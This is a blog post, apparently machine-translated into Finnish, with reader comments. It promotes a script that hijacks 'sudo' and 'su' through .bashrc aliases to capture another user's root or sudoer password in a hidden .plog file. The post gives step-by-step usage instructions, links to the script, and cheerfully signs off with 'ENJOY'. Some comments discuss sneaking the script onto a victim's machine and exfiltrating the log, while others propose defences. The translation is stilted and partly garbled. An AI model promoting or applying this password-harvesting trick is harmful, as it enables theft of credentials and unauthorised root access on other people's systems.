Hanki ROOT-salasana

Olen törmännyt komentosarjaan, joka muuttaa .bashrc: tä luomalla aliaksen "sudolle" ja "su": lle. ei ennen tekemättä varmuuskopiota tiedostosta sen palauttamiseksi myöhemmin.

Se tekee, että se lähettää virheilmoituksen käytettäessä "sudo" tai "su" ja sieppaa salasanan ".plog" -lokiin, joka on kotona.

Käyttötapa

  1. Tallenna komentosarja
  2. Anna sille suoritusoikeudet.
  3. Suorita se terminaalissa
  4. Sulje pääte
  5. Odota.
  6. Tarkista sitten .plog-tiedosto. Ja sudoereissa olevan juuren tai jonkun käyttäjän salasanan on oltava.

http://paste.desdelinux.net/4691

NAUTTIA.


Jätä kommentti

Sähköpostiosoitettasi ei julkaista. Pakolliset kentät on merkitty *

*

*

  1. Vastuussa tiedoista: Miguel Ángel Gatón
  2. Tietojen tarkoitus: Roskapostin hallinta, kommenttien hallinta.
  3. Laillistaminen: Suostumuksesi
  4. Tietojen välittäminen: Tietoja ei luovuteta kolmansille osapuolille muutoin kuin lain nojalla.
  5. Tietojen varastointi: Occentus Networks (EU) isännöi tietokantaa
  6. Oikeudet: Voit milloin tahansa rajoittaa, palauttaa ja poistaa tietojasi.

  1.   v3on dijo

    tälle kavereille on, että tiimimme fyysistä turvallisuutta ei pidä unohtaa

    1.    truko22 dijo

      Aivan, jos tietokonetta lainataan hetkeksi, sinun on tarkistettava aliakset 😀

  2.   Lolo dijo

    Viaton kysymys:

    Kuinka komentosarja muuttaa ei-itse sudoer-käyttäjän .bashrc-tiedostoa?

  3.   Blaire pascal dijo

    Oo pidän siitä todella. Testaus.

  4.   pacoeloyo dijo

    Joten tietoturva ja salaus, joita käytämme gnu / Linuxissa, ovat arvottomia? Luulen, että näin ei ole, kuka tahansa yrittää kommentoida tuloksia. Tämän järjestelmän käytön jälkeen olen lukenut, että Linuxin salaustasot ovat erittäin korkeat: salasanat salataan yksisuuntaisilla salausalgoritmeilla, ja nyt käy ilmi, että yksinkertaisen komentosarjan avulla salaus ohitetaan. Olen pahoillani, mutta en usko sitä.

    1.    @Jlcux dijo

      Jos se toimii, katso. Tapahtuma on, että komentosarja luo aliaksen .bashrc-tiedostoon sudon ja su: n kanssa. Ja kun kirjoitat su ja / tai sudo. Hän lukee alias ensin. ei komento sellaisenaan. joten kun kirjoitat salasanan, hän laittaa sen normaaliin tekstitiedostoon. ja sitten se poistaa aliaksen ja antaa sinun käyttää sudoa tai yhteistä ja nykyistä. Tarkoitan, se on kuin kalastus. Ei ole, että se ohittaa salauksen. se on väärä sisäänkirjautuminen.

      1.    pacoeloyo dijo

        Okei nyt, jos ymmärrän, olin jo yllättynyt ohittaessani suojan torreraan .. Kiitos sen selvittämisestä.

        1.    kike dijo

          Toki, mutta vaikein asia on edelleen saada komentosarja hiipumaan uhrin tietokoneelle, saada se toimimaan ja sitten kerätä tiedosto etäyhteyden kautta tai lähettää se sähköpostiin. Siellä jokaisen on käytettävä mielikuvitustaan!

    2.    koskaan dijo

      Luulit, että liioitit paljon pacoeloyoa. Tämä on yksinkertainen troijalainen, joka vaatii käyttäjän ohittamaan erilaiset turvatoimet ja hyökkääjän paikallisen läsnäolon. Se on olemassa missä tahansa käyttöjärjestelmässä.
      Komentosarjan osalta ... jos en erehdy, useimmat nykyiset SUDOt todentavat käyttäjän salasanalla, ei juurisalasanalla. Joten saatava salasana on käyttäjän (läsnä sudoereissa) salasana.
      terveiset

      1.    @Jlcux dijo

        on sudo tai su. Myös jos käyttäjä voi käyttää sudoa, se johtuu siitä, että hän on sudoereissa ja että hänellä on samat oikeudet kuin juurella .. vai ei?

        1.    koskaan dijo

          ei aina, se riippuu sudoers-kokoonpanosta. Joka tapauksessa yleisin on, että kyllä, sinulla on täysi pääsy.
          Asia on, että sudo-toiminnolla suoritetut toiminnot kirjataan yleensä

      2.    diatsepa dijo

        yksinkertaisesti kutsumalla "su" saat pääsyn juuritilille.

  5.   ps dijo

    Tämä on erittäin vaarallista, jos käytät hyviä salasanoja jaetuissa luokkahuone- tai työpajaympäristöissä. He voivat pelata sitä sinulle. No, he olisivat voineet pelata sitä ...

    Ei ole hyödyllistä löytää muukalaisen salasanoja, mutta mielestäni tuttavan se riittää.

    Muista, että useimmat kopioivat salasanansa tai käyttävät yleisiä malleja. Älä koskaan aliarvioi niitä. Jos olet tietysti erittäin paskiainen ...

  6.   Germaine dijo

    No, en hämmenty ... Minulla ei ole mitään salattavaa, edes loppukokeen kysymyksiä ... ja jos tarvitsen salasanaa, kysyn sen ... ja tiedostoni ovat ulkoisella kiintolevyllä .. . varmuuskopion kannettavalla tietokoneella, joka pysyy talossa.
    Meidän on etsittävä yksinkertaisuutta ja käytännöllisyyttä, tänään olen huomenna elossa en tiedä ... Asun tänään, loput ovat ylitöitä.

  7.   ferchmetal dijo

    Pidän sen mielessä, kiitos.

  8.   elynx dijo

    Mielenkiintoista!

  9.   Lolo dijo

    Kuinka tämä komentosarja kopioi itsensä sudoer-käyttäjän .bashrc-tiedostoon?

    Jos sinulla on tili tietokoneella, et voi siirtyä toisen käyttäjän kotiin, ellei sinulla ole lupaa, ja epäilen edelleen, että voit muokata uhrin .bashrc-tiedostoa.

    Epäilen kovasti, että se toimii, ellei sudoer-käyttäjä ole erittäin huolimaton.

  10.   lex aleksandre dijo

    Meidän on oltava hyvin varovaisia ​​tällä säällä!

  11.   Marcos dijo

    Yksi kysymys, jos minulla ei ole juurisalasanaa, miten voin antaa tiedoston suorittamisoikeuden? Tai normaali käyttäjä toimii?

    1.    @Jlcux dijo

      Asia selvä. Suorita käyttöoikeudet eivät ole yksinomaan juurille.

      1.    Alberto Aru dijo

        AUTA!
        kokeilun jälkeen olen poistanut .sudo_sd eikä löydä mitään Googlesta (tai muista hakukoneista)

        1.    Alberto Aru dijo

          Poistin .plogin ja se poistettiin automaattisesti .sudo_sd, enkä voi kirjautua pääkäyttäjänä

          1.    Alberto Aru dijo

            Korjataan kommentoimalla ALIAS

  12.   Kortti dijo

    Jos tämä toimii MAC: ssä, menen uistelemaan Apple-myymälää ... hei! mutta vain vähän, ei terroristisuunnitelmassa 😉

  13.   Atheyus dijo

    Mielenkiintoinen merkintä

    Epäilys

    Ja jos käytän gde: tä tai vastaavaa kde: ssä

    Se sieppaa myös salasanan

    terveiset

  14.   kypärän käyttöikä dijo

    Tämän komentosarjan suorittaminen voidaan välttää antamalla .bashrc: lle vain luku -oikeus

  15.   Blazek dijo

    Testattu, se toimii, aunkilla on rajoituksensa. Opit aina uusia asioita Linuxissa.

  16.   Alberto Aru dijo

    Kuinka voin peruuttaa kerran tehdyt muutokset? Olen poistanut .plogin, eikä se anna minun käyttää sudoa:
    bash: /home/alberto/.sudo_sd: Tiedostoa tai hakemistoa ei ole olemassa

    1.    Alberto Aru dijo

      Korjataan kommentoimalla ALIAS